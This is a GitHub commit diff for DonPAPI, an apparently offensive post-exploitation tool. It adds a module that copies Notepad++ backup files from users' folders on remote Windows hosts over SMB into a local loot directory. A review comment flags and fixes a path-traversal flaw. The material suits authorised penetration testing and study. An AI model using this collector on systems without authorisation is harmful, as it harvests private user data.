Merge pull request #81 from Dfte/Add-Notepad++-collector

Add notepad++ collector
This commit is contained in:
Login Securite 2024-10-19 13:21:39 +02:00 committed by GitHub
commit 08282a06d2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
2 changed files with 11 additions and 9 deletions


@ -7,11 +7,11 @@ from donpapi.core import DonPAPICore
from donpapi.lib.logger import DonPAPIAdapter
TAG = "PowerShellHistory"
TAG = "NotepadPP"
class PowerShellHistoryDump:
class NotepadPPDump:
false_positive = [".", "..", "desktop.ini", "Public", "Default", "Default User", "All Users", ".NET v4.5", ".NET v4.5 Classic"]
user_directories = ["\\Users\\{username}\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\"]
user_directories = ["Users\\{username}\\AppData\\Roaming\\Notepad++\\backup\\"]
max_filesize = 5000000
def __init__(self, target: Target, conn: DPLootSMBConnection, masterkeys: list, options: Any, logger: DonPAPIAdapter, context: DonPAPICore) -> None:
@ -25,12 +25,12 @@ class PowerShellHistoryDump:
def run(self):
self.logger.display("Gathering powershell history files")
self.logger.display("Gathering notepad++ backup files")
for user in self.context.users:
for directory in self.user_directories:
directory_path = directory.format(username=user)
self.dig_files(directory_path=directory_path, recurse_level=0, recurse_max=10)
self.logger.secret(f"Found {self.found} powershell history files", TAG)
self.logger.secret(f"Found {self.found} notepad++ backup files", TAG)
def dig_files(self, directory_path, recurse_level=0, recurse_max=10):
directory_list = self.conn.remote_list_dir(self.context.share, directory_path)
@ -48,10 +48,10 @@ class PowerShellHistoryDump:
file_content = b""
f.write(file_content)
# Stores files in loot\PowerShellHistory
os.makedirs(f"{self.context.output_dir}/../PowerShellHistory", exist_ok=True)
# Stores files in loot\NotepadPP
os.makedirs(f"{self.context.output_dir}/../NotepadPP", exist_ok=True)
local_filepath = os.path.join(
f"{self.context.output_dir}/../PowerShellHistory",
f"{self.context.output_dir}/../NotepadPP",
f"{item.get_longname()}-{self.found}"
)
with open(local_filepath, "wb") as f:
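Review bot: `local_filepath` is built by joining `item.get_longname()` — a filename taken verbatim from the remote SMB directory listing — under `loot/NotepadPP`, so a listing entry containing `..` or a path separator (possible from a hostile or tampered share) would be written outside the loot directory; this pattern is inherited from the PowerShellHistory collector, but the new code should close it with something like `safe_name = os.path.basename(item.get_longname().replace("\\", "/"))` and `f"{safe_name}-{self.found}"` in the join. Separately, the new `user_directories` entry drops the leading `\\` that the PowerShellHistory path keeps (`"Users\\{username}\\..."` vs `"\\Users\\{username}\\..."`); whether that matters depends on how `remote_list_dir` joins `self.context.share` and the path, which is not visible here, so confirm it against the other collectors. A short comment above the directory list would also help the next reader, e.g. `# Notepad++ keeps unsaved-buffer snapshots here; they are copied as-is, so treat the loot as potentially sensitive`. The enclosing `dig_files` method starts in the previous hunk and its body continues past the end of this one.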


@ -40,6 +40,7 @@ from donpapi.collectors.recent_files import FilesDump, TAG as FilesTag
from donpapi.collectors.sccm import SCCMDump, TAG as SCCMTag
from donpapi.collectors.mremoteng import MRemoteNgDump, TAG as MRemoteNgTag
from donpapi.collectors.vnc import VNCDump, TAG as VNCTag
from donpapi.collectors.notepadpp import NotepadPPDump, TAG as NotepadPPTag
from donpapi.collectors.powershellhistory import PowerShellHistoryDump, TAG as PowerShellHistoryTag
from donpapi.lib.config import DonPAPIConfig, parse_config_file
from donpapi.lib.database import Database, create_db_engine
@ -63,7 +64,8 @@ COLLECTORS_LIST = {
VaultsTag: VaultsDump,
VNCTag: VNCDump,
WifiTag: WifiDump,
PowerShellHistoryTag: PowerShellHistoryDump
PowerShellHistoryTag: PowerShellHistoryDump,
NotepadPPTag: NotepadPPDump
}
def set_main_logger(logger , host = "\U0001F480"):